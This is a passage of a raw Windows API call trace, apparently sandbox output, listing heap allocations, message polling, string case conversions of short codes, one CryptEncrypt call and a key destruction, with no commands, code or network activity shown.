Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.753] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.754] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0190.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.754] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.754] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.755] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.755] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.755] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.756] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0190.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.756] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24e24c8*, pdwDataLen=0x8bef68*=0x552a, dwBufLen=0x5530 | out: pbData=0x24e24c8*, pdwDataLen=0x8bef68*=0x5530) returned 1 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0190.757] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01c0 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01e0 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0170 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0190.757] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.757] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01c0 [0190.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0190.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01e0 [0190.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0190.758] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0190.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0190.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0190.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.759] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.759] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.760] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.760] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.760] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.760] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.760] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.760] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.760] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.760] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.760] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.760] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0190.761] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.761] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.761] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.761] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.761] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.761] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.761] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.761] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.764] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.764] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.764] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.766] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0190.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.767] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.767] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0190.767] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0190.767] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0190.767] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.767] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0190.767] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.767] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.768] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.768] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.768] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.768] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.768] CryptDestroyKey (hKey=0xaa58a0) returned 1 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0190.768] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0190.769] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0190.769] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.769] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0190.769] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.769] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.769] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0190.769] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.769] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 